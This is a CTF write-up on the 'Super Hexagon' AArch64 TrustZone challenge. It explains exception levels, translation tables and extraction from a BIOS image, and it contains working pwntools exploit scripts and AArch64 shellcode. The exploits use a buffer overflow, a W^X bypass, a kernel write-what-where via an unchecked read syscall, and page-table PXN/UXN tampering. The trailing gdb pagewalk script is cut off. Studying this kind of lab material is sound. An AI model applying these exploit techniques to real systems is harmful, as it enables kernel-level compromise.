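I recently wanted to dig deeper into Arm binaries and related protection mechanisms such as TrustZone, so I worked through this CTF challenge and read the relevant documentation to learn about Arm.
- In AArch64, all instructions are a fixed 4 bytes wide; the 2-byte Thumb mode is removed entirely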
- Exception Levels (EL): EL0, EL1, EL2, EL3
- EL0 - user mode
- EL1 the supervisor
- EL2 typically the hypervisor
- EL3 the trusted firmware or secure monitor (for trustzone)
- Each exception level, except EL2, has a secure or non-secure mode
- controlled by the NS bit, which is switched by taking an exception to EL3 (SMC - Secure Monitor Call)
- `svc` - Supervisor Call
- `hvc` - Hypervisor Call
- `smc` - Secure Monitor Call
README:
Flags have to be read from 8 sysregs: s3_3_c15_c12_0 ~ s3_3_c15_c12_7
For example, in aarch64, you may use:
mrs x0, s3_3_c15_c12_0
mrs x1, s3_3_c15_c12_1
.
.
.
mrs x7, s3_3_c15_c12_7
For first two stages, EL0 and EL1, `print_flag' functions are included.
Make good use of them.
qemu-system-aarch64, based on qemu-3.0.0, is also patched to support this
feature. See `qemu.patch' for more details.
Use `binwalk --dd=".*" ./bios.bin` to extract the target executable from the BIOS image:
// file
ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, with debug_info, not stripped
// checksec
[*] '/home/u1f383/release/super_hexagon/share/_bios.bin.extracted/chal'
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
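When opening it in IDA, select Arm Little-Endian as the processor type.
`run()` calls functions through a function pointer array:
cmdtb[cmd](buf, idx, v0);
However, the `scanf()` it calls is implemented internally with `gets(input)`, and `input` sits just before `cmdtb` in memory. Overflowing `input` out of bounds therefore overwrites a `cmdtb` entry with `print_flag()` and yields the flag. The exploit: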
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(print_flag))
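r.interactive()

To exploit the kernel, we first need to execute arbitrary shellcode, which means the data written through the first-stage buffer overflow has to become executable. Section permissions prevent that, so we need `mprotect()` and `mmap()` to change them. Both are requested from the kernel through the `svc` instruction (Supervisor Call, which causes an exception to be taken to EL1).
The three arguments of `cmdtb[cmd](buf, idx, v0);` all happen to be attacker-controlled, so the call can be used to run `mprotect()`: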
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
mprotect = 0x401B68
EXEC = 4
WRITE = 2
READ = 1
# mprotect(addr, 0x1000, RWX)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | WRITE | EXEC))
r.interactive()

However, W^X is enforced on page permissions (`ERROR: [VMM] RWX pages are not allowed`), so a page cannot be writable and executable at the same time. Writing first and only then making the page executable gets around this:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
mprotect = 0x401B68
gets = 0x4019B0
addr = 0x00007ffeffffd000
EXEC = 4
WRITE = 2
READ = 1
input(">")
# gets(addr)
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'0'.ljust(0x100, b'\x00') + p64(gets))
input(">shellcode")
r.sendline(b'\x00'*0x30 + bytes.fromhex('1f2003d51f2003d51f2003d51f2003d5c0035fd6'))
input(">")
# mprotect(addr, 0x1000, R-X)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | EXEC))
# call addr
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(addr + 0x30))
r.interactive()

With arbitrary shellcode execution in hand, go back and analyze bios.bin and the qemu patch:
// qemu.patch
+static const MemMapEntry memmap[] = {
+ /* Space up to 0x8000000 is reserved for a boot ROM */
+ [VIRT_FLASH] = { 0, 0x08000000 },
+ [VIRT_CPUPERIPHS] = { 0x08000000, 0x00020000 },
+ [VIRT_UART] = { 0x09000000, 0x00001000 },
+ [VIRT_SECURE_MEM] = { 0x0e000000, 0x01000000 },
+ [VIRT_MEM] = { 0x40000000, RAMLIMIT_BYTES },
+};

| Region | Base | Size |
|---|---|---|
| VIRT_FLASH | 0 | 0x08000000 |
| VIRT_CPUPERIPHS | 0x08000000 | 0x00020000 |
| VIRT_UART | 0x09000000 | 0x00001000 |
| VIRT_SECURE_MEM | 0x0e000000 | 0x01000000 |
| VIRT_MEM | 0x40000000 | RAMLIMIT_BYTES |
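To make the map easier to query while reversing, here is a minimal sketch that looks up which region an address falls into. The `MEMMAP` dictionary and `region_of` helper are illustrative names, not part of QEMU; the values are copied from the patch, and `VIRT_MEM` is left out because `RAMLIMIT_BYTES` is not spelled out in the excerpt.

```python
# Regions copied from memmap[] in qemu.patch: name -> (base, size).
# VIRT_MEM is omitted because RAMLIMIT_BYTES is not given in the excerpt.
MEMMAP = {
    "VIRT_FLASH": (0x00000000, 0x08000000),
    "VIRT_CPUPERIPHS": (0x08000000, 0x00020000),
    "VIRT_UART": (0x09000000, 0x00001000),
    "VIRT_SECURE_MEM": (0x0E000000, 0x01000000),
}


def region_of(addr):
    """Return the name of the region containing addr, or None if unmapped."""
    for name, (base, size) in MEMMAP.items():
        if base <= addr < base + size:
            return name
    return None


if __name__ == "__main__":
    for addr in (0x2850, 0x09000000, 0x0E400000, 0x0F000000):
        print(hex(addr), region_of(addr))
```

Note that the second field of each `MemMapEntry` is a size, so the end of a region is `base + size`.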
Load bios.bin into IDA, select ARM Little-Endian, and press C at 0x000000 to tell IDA that this is code. Then analyze sub_0:
...
_WriteStatusReg(ARM64_SYSREG(3, 6, 1, 0, 0), 0x30C50830ui64);
__isb(0xFu);
_WriteStatusReg(ARM64_SYSREG(3, 6, 12, 0, 0), sub_2000);
__isb(0xFu);
...
memcpy(0xE000000i64, 0x2850i64, 0x68i64);
memcpy(0x40100000i64, 0x10000i64, 0x10000i64); // EL2
memcpy(0xE400000i64, 0x20000i64, 0x90000i64); // SEL1 (I dont know why)
memcpy(0x40000000i64, sub_B0000, 0x10000i64); // EL1
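...

The first part reads and writes system registers. The registers can be looked up in the manual, or ida-arm-system-highlight can be used to generate comments describing each instruction in detail. AMIE shortens how MSR and MRS instructions are displayed, which makes it clearer which register an instruction touches while reversing.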
| Region | Level | From | To |
|---|---|---|---|
| VIRT_FLASH | S-EL3 monitor | 0 | 0x08000000 |
| VIRT_CPUPERIPHS | | 0x08000000 | 0x08020000 |
| VIRT_UART | | 0x09000000 | 0x09001000 |
| VIRT_SECURE_MEM | | 0x0e000000 | 0x0e400000 |
| VIRT_SECURE_MEM | S-EL1 (32-bit) Trusted OS | 0x0e400000 | 0x0e490000 |
| VIRT_SECURE_MEM | | 0x0e490000 | 0x0f000000 |
| VIRT_MEM | EL1 kernel | 0x40000000 | 0x40010000 |
| VIRT_MEM | | 0x40010000 | 0x40100000 |
| VIRT_MEM | EL2 hypervisor | 0x40100000 | 0x40110000 |
| VIRT_MEM | | 0x40110000 | 0x40000000 + RAMLIMIT_BYTES |
Then dump the binary for each level with dd:
#!/bin/sh
dd if=bios.bin of=unknown.bin skip=10320 bs=1 count=104
dd if=bios.bin of=el2.bin skip=65536 bs=1 count=65536
dd if=bios.bin of=sel1.bin skip=131072 bs=1 count=589824
dd if=bios.bin of=el1.bin skip=720896 bs=1 count=65536

The current target is el1.bin, the OS. After loading el1.bin into IDA, use Edit --> Segments --> Rebase program to rebase it to 0xFFFFFFFFC0000000. In the previous stage, when `svc` was called while running keystore, gdb-multiarch jumped to 0xFFFFFFFFC0000000 + offset, which tells us the kernel base is 0xFFFFFFFFC0000000.
AArch64 EL1 (in both Secure and Non-secure state) has two virtual memory mappings:
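The same extraction can be sketched in Python, which avoids the byte-at-a-time `bs=1` copies. The offsets and sizes below are the `skip` and `count` values of the dd commands written in hex; the `PIECES`, `carve`, and `carve_all` names are illustrative only.

```python
# (output name, offset, size), matching the skip/count values of the dd commands.
PIECES = [
    ("unknown.bin", 0x2850, 0x68),
    ("el2.bin", 0x10000, 0x10000),
    ("sel1.bin", 0x20000, 0x90000),
    ("el1.bin", 0xB0000, 0x10000),
]


def carve(blob, offset, size):
    """Return blob[offset:offset+size], refusing to read past the end."""
    if offset < 0 or size < 0 or offset + size > len(blob):
        raise ValueError("range 0x%x+0x%x is outside the image" % (offset, size))
    return blob[offset:offset + size]


def carve_all(path="bios.bin"):
    """Write every piece listed in PIECES next to the current directory."""
    with open(path, "rb") as f:
        blob = f.read()
    for name, offset, size in PIECES:
        with open(name, "wb") as out:
            out.write(carve(blob, offset, size))


if __name__ == "__main__":
    carve_all()
```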
- (D13.2.135) TTBR0 - typically corresponds to user mode processes
- Holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the lower VA range in the EL1&0 translation regime, and other information for this translation regime.
- (D13.2.138) TTBR1 - defines the mappings for the kernel space
- Holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the higher VA range in the EL1&0 stage 1 translation regime, and other information for this translation regime.
- P. 2723 - Figure D5-13 AArch64 TTBRn boundaries and VA ranges for 48-bit VAs
- Memory regions
Next we analyze the EL1 svc handler, because it is the only way a user-mode program can talk to the kernel. Before that, some more AArch64 background is needed:
- VBAR - base address of the exception vector table
- ELR - exception return address
- TTBR - base address of the translation table
- TCR - settings for the translation tables
| Exception level | TTBR register | TCR register | Used in this challenge |
|---|---|---|---|
| EL0 | none | none | - |
| EL1 (for user space) | TTBR0_EL1 | TCR_EL1 | ✔ |
| EL1 (for the kernel) | TTBR1_EL1 | same as above | ✔ |
| EL2 (without a hypervisor) | TTBR0_EL2 | TCR_EL2 | ✖ |
| EL2 (with a hypervisor) | VTTBR_EL2 | VTCR_EL2 | ✔ |
| S-EL3 | TTBR0_EL3 | TCR_EL3 | ✔ |
- When a CPU with paging enabled receives a memory access by VA, it consults the appropriate page table and performs a page walk (VA --> PA)
  - A page walk is expensive because resolving a VA to a PA takes several table lookups. This is why CPUs have a translation cache called the `TLB` (Translation Lookaside Buffer), and AArch64 is no exception
- In AArch64, every exception level (EL) except EL0 has one or more translation table registers, which means there can be at least three distinct virtual memory spaces (`EL1`, `EL2`, `S-EL3`). The same holds for this challenge
  - In S-EL3, `TTBR0_EL3` and `TCR_EL3` are initialized at boot
  - In EL2, `VTTBR_EL2` and `VTCR_EL2` are initialized
  - In EL1, `TTBR0_EL1` (for user space), `TTBR1_EL1` (for the kernel), and `TCR_EL1` are initialized
- Each register serves the following purpose:
  - `TTBR` (Translation Table Base Register) - physical base address of the page table for a given EL
  - `VTTBR` (Virtualization Translation Table Base Register) - physical base address of the page table used when a hypervisor is in use
    - Does this overlap with TTBR?
  - `TCR` (Translation Control Register) - configures page table properties such as the page granularity (`TG0` = 4KB, 16KB, 64KB) and the VA space range (`T0SZ`)
- The actual page table is a multi-level tree that describes page permissions and ultimately resolves to a physical address.
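As a small worked example of the multi-level tree, the sketch below splits a VA into per-level table indices, assuming a 4KB granule and a 4-level (48-bit) walk. The `va_indices` helper is an illustrative name. The sample address is the mmap'd page that appears later in this write-up, whose last-level entry the pagewalk output places at offset 0xfe0 of its table.

```python
def va_indices(va, granule_bits=12, levels=4):
    """Split a VA into per-level table indices (level 0 first) and a page offset.

    Assumes 8-byte descriptors, so a 4KB table holds 512 entries (9 bits per level).
    """
    bits_per_level = granule_bits - 3
    mask = (1 << bits_per_level) - 1
    indices = []
    for level in range(levels):
        shift = granule_bits + (levels - 1 - level) * bits_per_level
        indices.append((va >> shift) & mask)
    return indices, va & ((1 << granule_bits) - 1)


if __name__ == "__main__":
    idx, offset = va_indices(0x00007FFEFFFFC000)
    print("indices:", [hex(i) for i in idx], "page offset:", hex(offset))
    # Byte offset of the last-level descriptor inside its table
    print("last-level entry offset:", hex(idx[-1] * 8))
```

The last-level index times 8 gives the descriptor's byte offset within its table, which is how a VA can be matched to the entry address printed by a page walk.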
Register values observed at run time:
- EL1
- TTBR0_EL1 - 0x20000
- TTBR1_EL1 - 0x1b000
- TCR_EL1 - 0x6080100010
- EL2
- TTBR0_EL2 - 0x0
- TCR_EL2 - 0x0
- VTTBR_EL2 - 0x40106000
- VTCR_EL2 - 0x80000027
- EL3
- TTBR0_EL3 - 0xe203000
- TCR_EL3 - 0x100022
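The TCR_EL1 value above can be decoded by hand. The following sketch extracts only the fields discussed in this write-up (T0SZ, T1SZ, TG0, TG1) and derives the two VA ranges from them; `decode_tcr_el1` is an illustrative helper, not a library function.

```python
def decode_tcr_el1(tcr):
    """Decode the size and granule fields of TCR_EL1 and derive the VA ranges."""
    t0sz = tcr & 0x3F            # bits [5:0]
    t1sz = (tcr >> 16) & 0x3F    # bits [21:16]
    # TG0 and TG1 use different encodings; reserved values map to None.
    tg0_kb = {0b00: 4, 0b01: 64, 0b10: 16}.get((tcr >> 14) & 0b11)
    tg1_kb = {0b01: 16, 0b10: 4, 0b11: 64}.get((tcr >> 30) & 0b11)
    return {
        "T0SZ": t0sz,
        "T1SZ": t1sz,
        "TG0_KB": tg0_kb,
        "TG1_KB": tg1_kb,
        "user_max": (1 << (64 - t0sz)) - 1,
        "kernel_min": (1 << 64) - (1 << (64 - t1sz)),
    }


if __name__ == "__main__":
    for key, value in decode_tcr_el1(0x6080100010).items():
        print(key, hex(value) if value is not None else value)
```

For 0x6080100010 both regions are 48 bits wide with a 4KB granule, so the kernel base 0xFFFFFFFFC0000000 falls in the TTBR1_EL1 range and user addresses such as 0x7ffeffffd000 fall in the TTBR0_EL1 range.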
Because `svc` is a synchronous exception and it is taken from a lower EL running in AArch64 state, the exception handler at VBAR_EL1 + 0x400 is executed.
P.S. gdb could not print VBAR_EL1, but VBAR printed the correct address (0xffffffffc000a000).

| EL | VBAR register | Needed for this challenge |
|---|---|---|
| EL0 | none | - |
| EL1 | VBAR | ✔ |
| EL2 | VBAR_EL2 | ✔ |
| S-EL3 | VBAR_EL3 | ✔ |

- When high exception vectors are not selected, holds the vector base address for exceptions that are not taken to Monitor mode or to Hyp mode
- Software must program VBAR(NS) with the required initial value as part of the PE boot sequence

So 0xffffffffc000a000 + 0x400 jumps to sync_interrupt_handler:
ROM:FFFFFFFFC000A400 ; ---------------------------------------------------------------------------
ROM:FFFFFFFFC000A400 STR X30, [SP,#0xF0]
ROM:FFFFFFFFC000A404 B sync_interrupt_handler
ROM:FFFFFFFFC000A404 ; ---------------------------------------------------------------------------
ROM:FFFFFFFFC000A408 ALIGN 0x80
ROM:FFFFFFFFC000A480 DCB 0x20

P.S. Each exception vector entry is 0x80 bytes, so in IDA you can press l after the code to set the alignment to 0x80.
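The offset arithmetic can be sketched as follows. The AArch64 vector table has four groups of four 0x80-byte entries; the dictionary keys and the `vector_address` helper are illustrative names chosen for this sketch.

```python
# Group offsets: where the exception was taken from.
VECTOR_GROUPS = {
    "current_el_sp0": 0x000,
    "current_el_spx": 0x200,
    "lower_el_aarch64": 0x400,
    "lower_el_aarch32": 0x600,
}

# Entry offsets within a group: what kind of exception it is.
VECTOR_KINDS = {
    "sync": 0x000,
    "irq": 0x080,
    "fiq": 0x100,
    "serror": 0x180,
}


def vector_address(vbar, group, kind):
    """Return the address of the vector entry for the given source and kind."""
    return vbar + VECTOR_GROUPS[group] + VECTOR_KINDS[kind]


if __name__ == "__main__":
    vbar = 0xFFFFFFFFC000A000
    # svc from EL0 (AArch64) is a synchronous exception from a lower EL
    print(hex(vector_address(vbar, "lower_el_aarch64", "sync")))
    print(hex(vector_address(vbar, "lower_el_aarch64", "irq")))
```

The second address is the next entry in the group, which matches the 0xFFFFFFFFC000A480 boundary visible in the listing.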
ROM:FFFFFFFFC000A80C sync_interrupt_handler ; CODE XREF: ROM:FFFFFFFFC000A404↑j
ROM:FFFFFFFFC000A80C
ROM:FFFFFFFFC000A80C arg_110 = 0x110
ROM:FFFFFFFFC000A80C arg_170 = 0x170
ROM:FFFFFFFFC000A80C
ROM:FFFFFFFFC000A80C BL save_context
ROM:FFFFFFFFC000A810 MRS X0, TTBR0_EL1 ; [<] TTBR0_EL1 (Translation Table Base Register 0 (EL1))
ROM:FFFFFFFFC000A814 STR X0, [SP,#arg_170]
ROM:FFFFFFFFC000A818 MOV X6, SP
ROM:FFFFFFFFC000A81C LDR X12, [SP,#arg_110]
ROM:FFFFFFFFC000A820 MSR SPSel, #0 ; Select PSTATE.SP = SP_EL0
ROM:FFFFFFFFC000A824 MOV SP, X12
ROM:FFFFFFFFC000A828 MOV X0, X6
ROM:FFFFFFFFC000A82C BL handle_syscall
ROM:FFFFFFFFC000A830 BL transition_um

- `save_context` stores the current registers on the EL0 stack
- When reversing `handle_syscall`, this syscall table is a useful reference: https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#arm64-64_bit

When handling the read syscall, `handle_syscall` does not check whether the destination address lies in user space, so it can overwrite kernel-space memory:
__int64 __fastcall handle_syscall(unsigned __int64 *param)
{
...
if ( _ReadStatusReg(ESR_EL1) >> 26 != 21 )
cpuidle();
x0 = *param;
x1 = param[1];
x2 = param[2];
x3 = param[3];
syscall_NR = param[8];
switch ( syscall_NR )
{
case _NR_SYSCALL_READ:
if ( x2 )
{
syscall_NR = read_one_byte();
if ( (syscall_NR & 0x80000000) != 0 )
{
x2 = -1i64;
}
else
{
*x1 = syscall_NR; // overwrite one byte
x2 = 1i64;
}
}
break;
...

- Because `syscall_read` can write to kernel space, we have a kernel-level write-what-where primitive
- The other functions do not appear to perform address checks either
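The check `_ReadStatusReg(ESR_EL1) >> 26 != 21` at the top of the handler tests the exception class (EC) field. A minimal sketch of that decoding follows; the helper names are illustrative, and the sample value 0x56000000 is what one would expect for `svc 0` issued from AArch64 state, given here as an illustration rather than a value captured from the challenge.

```python
EC_SVC_AARCH64 = 0x15  # 21: SVC instruction executed in AArch64 state


def decode_esr(esr):
    """Split an ESR_ELx value into its EC, IL, and ISS fields."""
    return {
        "EC": (esr >> 26) & 0x3F,   # exception class, bits [31:26]
        "IL": (esr >> 25) & 0x1,    # instruction length, bit 25
        "ISS": esr & 0x1FFFFFF,     # instruction specific syndrome, bits [24:0]
    }


def is_svc64(esr):
    """True when the exception was caused by an AArch64 svc instruction."""
    return decode_esr(esr)["EC"] == EC_SVC_AARCH64


if __name__ == "__main__":
    print(decode_esr(0x56000000), is_svc64(0x56000000))
```

Any other exception class sends the handler into `cpuidle()`, so only `svc` reaches the syscall dispatch.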
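The attack works as follows:

- Use the missing address check in `read()` to write the address of `print_el1_flag` just past the stack
- Then overwrite 1 byte of the return address so that it points at a gadget, and use the gadget to steer `pc` to `print_el1_flag`. The gadget has to load `X29` (and `X30`) from the stack and be followed by `RET`, and only one byte of the return address can be changed
  - The gadget used:
    ROM:FFFFFFFFC0009430 LDP X19, X20, [SP,#var_s10]
    ROM:FFFFFFFFC0009434 LDP X29, X30, [SP+var_s0],#0x20
  - It can be found with IDA's text search using `ffffffffc000[0-9A-F]{2}30`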
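To see why a single byte is enough, the sketch below patches one byte of a little-endian 64-bit value. It assumes the saved return address is 0xFFFFFFFFC000A830, the instruction after `BL handle_syscall` in the listing above; that value is an inference from the disassembly, and `patch_byte` is an illustrative helper.

```python
import struct


def patch_byte(value, index, byte):
    """Replace byte `index` (0 = least significant) of a 64-bit little-endian value."""
    raw = bytearray(struct.pack("<Q", value))
    raw[index] = byte
    return struct.unpack("<Q", bytes(raw))[0]


if __name__ == "__main__":
    saved_return = 0xFFFFFFFFC000A830  # assumed: instruction after BL handle_syscall
    print(hex(patch_byte(saved_return, 1, 0x94)))
```

Writing 0x94 to the second byte leaves the low byte 0x30 intact, which is why the gadget search is restricted to addresses ending in 30.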
The AArch64 shellcode that writes the address of print_el1_flag and patches the return address:
.section .text
.global _start
_start:
LDR X10, =0xffffffffc0019c00
MOV X9, #0
.loop:
MOV X0, #0
ADD X1, X10, X9
MOV W2, #1
MOV X8, #0x3f
SVC 0 // read(0, buffer=target, n=1)
ADD X9, X9, #1
MOV X11, #0x10 // do 0x10 time
CMP X9, X11
B.MI .loop
# overwrite return gadget
# and return to print_el1_flag
LDR X10, =0xffffffffc0019bb8+1
NOP
MOV X0, #0
ADD X1, X10, #0
MOV W2, #1
MOV X8, #0x3f
SVC 0
# compile: aarch64-linux-gnu-as ./sc.s
# check: aarch64-linux-gnu-objdump -d ./a.out
# extract .text: aarch64-linux-gnu-objcopy -I elf64-littleaarch64 -j .text -O binary ./a.out ./output

The final EL1 exploit:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
print_el1_flag = 0xFFFFFFFFC0008408
mprotect = 0x401B68
gets = 0x4019B0
addr = 0x00007ffeffffd000
EXEC = 4
WRITE = 2
READ = 1
input(">")
# gets(addr)
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'0'.ljust(0x100, b'\x00') + p64(gets))
sc = open('./output', 'rb').read()
r.sendline(b'\x00'*0x30 + sc)
# mprotect(addr, 0x1000, R-X)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | EXEC))
# call addr
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(addr + 0x30))
input('>')
r.send(b'A'*8 + p64(print_el1_flag))
input('> ')
r.send(b'\x94')
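r.interactive()

Running arbitrary shellcode at EL1 takes one more step of preparation. At EL1 the translation table is selected by the address prefix: addresses in the kernel range use TTBR1_EL1, and addresses in the user range use TTBR0_EL1.
The T0SZ and T1SZ fields of TCR_EL1 control the size of each translated address range.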
page walk — a translation from a virtual to a physical address
- It is expensive (multiple lookups required to resolve a VA to PA)
- Processors speed this up with a translation cache called the Translation Lookaside Buffer (TLB); AArch64 uses the same hardware mechanism
- Each Exception Level in AArch64, except for EL0 has one or more translation table registers
- This means there can be at least three different virtual memory spaces (EL1, EL2, EL3)
- At boot:
  - EL3 --> `TTBR0_EL3` and `TCR_EL3`
  - EL2 --> `VTTBR_EL2` and `VTCR_EL2`
  - EL1 --> `TTBR0_EL1` (user) and `TTBR1_EL1` (kernel)
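The EL0 shellcode does the following:
- `mmap()` a region for the shellcode that will run at EL1
  - Map it RW first
  - After the shellcode is written, change it to RX
- Use the page walk to find the page entry describing that VA, and clear PXN and UXN (by writing 0x00)
- Allocate a new memory region to flush the TLB, so the cached upper attributes of the page are not used
- Write the EL1 shellcode address at + 0x30 past the return address of `syscall_handler`
  - The EL1 shellcode address is sent by the Python script
- Overwrite 1 byte of the return address so that it becomes `FFFFFFFFC0009430`, which eventually jumps to our EL1 shellcode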
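The PXN/UXN step relies on both bits living in the same byte of the descriptor. The sketch below shows the effect of zeroing byte 6 (bits 48 to 55). The sample descriptor is hypothetical: it combines the output address 0x35000 from the pagewalk output with plausible low attribute bits, and `zero_byte6` is an illustrative helper.

```python
PXN = 1 << 53  # Privileged execute-never
UXN = 1 << 54  # Unprivileged execute-never


def zero_byte6(desc):
    """Model a one-byte write of 0x00 at descriptor address + 6 (bits 48..55)."""
    raw = bytearray(desc.to_bytes(8, "little"))
    raw[6] = 0x00
    return int.from_bytes(raw, "little")


if __name__ == "__main__":
    # Hypothetical descriptor: UXN | PXN | output address 0x35000 | AF | AP=01 | page
    desc = UXN | PXN | 0x35000 | (1 << 10) | (0b01 << 6) | 0b11
    patched = zero_byte6(desc)
    print(hex(desc), "->", hex(patched))
    print("PXN set:", bool(patched & PXN), "UXN set:", bool(patched & UXN))
```

The write also clears the other upper attribute bits stored in that byte, which did not matter for this exploit. This corresponds to the `ADD X1, X12, #6` in the shellcode, which targets byte 6 of the entry at 0xffffffffc0028fe0.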
.section .text
.global _start
_start:
// mmap(0, 0x1000, 3, 0, 0, -1)
MOV X0, XZR // XZR is zero register
MOV X1, #0x1000 // len=0x1000
MOV W2, #3 // prot=rw
MOV W3, #0 // flags=0
MOV W4, #0 // fd=0
MOV X5, #-1 // offset=-1
MOV X8, #0xde
SVC 0
// will return 0x7ffeffffc000
// pagewalk output: [last] ffffffffc0028fe0 -> 00007ffeffffc000: 0x0000000000035000 [PXN UXN ELx/RW]
// X22 is shellcode page
MOV X22, X0
// gets(mmap_buffer) to read shellcode
MOV X0, X22
LDR X8, =0x4019B0
BLR X8
// change prot of mmap_buffer
// mprotect(mmap_buffer, 0x1000, 5)
MOV X0, X22
MOV X1, #0x1000
MOV W2, #5 // rx
MOV X8, #0xe2
SVC 0
LDR X12, =0xffffffffc0028fe0
MOV X0, XZR
ADD X1, X12, #6 // overwrite [54:53]
MOV W2, #1
MOV X8, #0x3f
SVC 0
// after: [last] ffffffffc0028fe0 -> 00007ffeffffc000: 0x0000000000035000 [ELx/R]
// we need to mmap a new memory to flush TLB
MOV X0, XZR // XZR is zero register
MOV X1, #0x1000 // len=0x1000
MOV W2, #3 // prot=rw
MOV W3, #0 // flags=0
MOV W4, #0 // fd=0
MOV X5, #-1 // offset=-1
MOV X8, #0xde
SVC 0
// write ROP
LDR X10, =0xffffffffc0019c00
MOV X9, #0
.loop:
MOV X0, #0
ADD X1, X10, X9
MOV W2, #1
MOV X8, #0x3f
SVC 0 // read(0, buffer=target, n=1)
ADD X9, X9, #1
MOV X11, #0x10 // do 0x10 time
CMP X9, X11
B.MI .loop
# overwrite return gadget
# and return to the EL1 shellcode
LDR X10, =0xffffffffc0019bb8+1
NOP
MOV X0, #0
ADD X1, X10, #0
MOV W2, #1
MOV X8, #0x3f
SVC 0

The EL1 shellcode, whose goal is to call print_el1_flag():
.section .text
.global _start
_start:
LDR x8, =0xFFFFFFFFC0008408
BLR X8
NOP

Python script:
#!/usr/bin/python3
from pwn import *
r = remote('localhost', 6666)
print_flag = 0x400104
mprotect = 0x401B68
gets = 0x4019B0
addr = 0x00007ffeffffd000 # el0 shellcode address
shellcode = 0x7ffeffffc000 # el1 shellcode address
EXEC = 4
WRITE = 2
READ = 1
input(">")
# gets(addr)
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'0'.ljust(0x100, b'\x00') + p64(gets))
sc = open('./el0', 'rb').read()
r.sendline(b'\x00'*0x30 + sc)
# mprotect(addr, 0x1000, R-X)
r.sendlineafter('cmd> ', b'1'.ljust(0x100, b'\x00') + p64(print_flag) + p64(mprotect))
r.sendlineafter('index: ', str(0x1000))
r.sendlineafter('key: ', '1'*(READ | EXEC))
# call addr
r.sendlineafter('cmd> ', '0')
r.sendlineafter('index: ', b'A'*0x100 + p64(addr + 0x30))
input('>')
el1_sc = open('./el1', 'rb').read()
r.sendline(el1_sc)
input('>')
r.send(b'\x00')
input('> write ROP')
r.send(b'A'*8 + p64(shellcode))
input('> write ret')
r.send(b'\x94')
r.interactive()

I slightly modified aarch64-pagewalk.py so that it prints the data in a way that is easier for me to follow:
import gdb
import math

KERNEL_BASE = 0xffffffffc0000000


class Pagewalk(gdb.Command):
    def __init__(self):
        self.CPSR_Mbit = {
            0b00: "User",
            0b01: "Kernel",
            0b10: "Hypervisor",
            0b11: "Monitor"
        }
        super(Pagewalk, self).__init__("pagewalk", gdb.COMMAND_DATA)

    def loadq(self, addr):
        v = gdb.parse_and_eval('*(unsigned long long*)(%s)' % addr)
        return int(v)

    # Upper attributes + Lower attributes parsing
    def format_ent(self, ent, S2):
        flags = []
        phy = ent & 0xfffffffff000
        # stage 2
        # intermediate phy addr space --> PA
        if S2:
            XN = (ent >> 53) & 0b11
            # S2AP = Stage 2 data Access Permissions bits
            S2AP = (ent >> 6) & 0b11
            # A = Access flag
            A = (ent >> 10) & 0b1
            if XN == 0:
                pass
            elif XN == 1:
                flags += ['PXN']
            elif XN == 2:
                flags += ['UXN', 'PXN']
            elif XN == 3:
                flags += ['UXN']
            if not A:
                flags += ['!ACC']
            if S2AP == 0:
                flags += ['ELx/NONE']
            elif S2AP == 1:
                flags += ['ELx/R']
            elif S2AP == 2:
                flags += ['ELx/W']
            elif S2AP == 3:
                flags += ['ELx/RW']
        # stage 1
        # VA --> intermediate phy addr space
        else:
            XN = (ent >> 53) & 0b11
            AP = (ent >> 6) & 0b11
            NS = (ent >> 5) & 0b1
            A = (ent >> 10) & 0b1
            if XN & 1:
                flags += ['PXN']
            if XN & 2:
                flags += ['UXN']
            if NS:
                flags += ['NS']
            if not A:
                flags += ['!ACC']
            if AP == 0:
                flags += ['EL1/RW']
            elif AP == 1:
                flags += ['ELx/RW']
            elif AP == 2:
                flags += ['EL1/R']
            elif AP == 3:
                flags += ['ELx/R']
        flags = " ".join(flags)
        return "0x%016lx [%s]" % (phy, flags)

    # pt_pa: page table physical address
    # pt_va_base: virtual base through which physical memory is reachable
    def print_table(self, pt_pa, granule_bits, region_sz,
                    pt_va_base=0, upper_region=False):
        # We assume the PA range is 47:0 (48-bits)
        ent_num_bits = granule_bits - 3  # each ent is 8 bytes (2**3)
        # 2**(ent_num_bits) ent
        # 2**3 per ent
        # 2**(3 + ent_num_bits) == 2**granule_bits == size per table
        ent_per_table = 2**(ent_num_bits)
        # round up to nearest level
        print("Calculate level: \t(%d - %d - %d) / %d"
              % (64, region_sz, granule_bits, ent_num_bits))
        levels = int(math.ceil((64.0 - region_sz - granule_bits) / ent_num_bits))
        print("Entries/table: \t%d" % ent_per_table)
        print("Levels: \t%d" % levels)
        # table addresses are physical. From the perspective of GDB
        # and depending on if the MMU is enabled, we need to find the
        # corresponding virtual address for the page tables
        tables = [[0, pt_pa]]
        next_tables = []
        if upper_region:
            tables[0][0] = 0xffff000000000000
        # stage 2 == el2 ?
        isS2 = self.CurrentEL == 2
        for level in range(levels):
            if len(tables) == 0:
                break
            # D5-2740
            # With the 4KB granule size, for the level 1 descriptor n is 30
            # and for the level 2 descriptor, n is 21
            # 39 / 30 / 21 / 12
            # a indexed by [n:39]
            # b indexed by [38:30]
            # c indexed by [29:21]
